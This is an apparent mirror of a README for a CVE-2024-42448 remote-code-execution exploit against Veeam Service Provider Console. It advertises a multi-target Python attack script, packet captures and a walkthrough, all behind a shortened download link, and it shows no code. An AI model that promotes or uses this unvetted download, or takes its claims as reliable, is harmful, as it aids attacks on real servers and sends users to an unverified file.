关联漏洞
描述
Veeam Service Provider Console (VSPC) remote code execution.
介绍
# CVE-2024-42448-RCE
Veeam Service Provider Console (`VSPC`) remote code execution.
[Download link here](https://bit.ly/4gknFFV)
# Details:
is a critical vulnerability identified in the Veeam Service Provider Console (`VSPC`) with a CVSS score of `9.9.`<br>
This vulnerability allows for remote code execution (`RCE`).<br>
# About:
(`files.zip`) here you'll find the files and including but not limit to tcp packets captured during testing<br>
some progress with `IDA` (which was unnecessary), but will be effective if you try to understand the root cause<br>
and produce a working exploit.<br>
every step is explained clearly with screenshots inside the process.pdf.<br>
for educational purpose only.
</p>
A python script (`CVE-2024-42448.py`) which trigger the vulnerability and execute user supplied command<br>
can also execute command on single and multiple targets(IP list) with multi-threading capability.<br>
# Download: [here](https://bit.ly/4gknFFV)
文件快照
[4.0K] /data/pocs/7068322f7cd9e0c0de9d184310aa9f79108d3496
└── [ 966] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。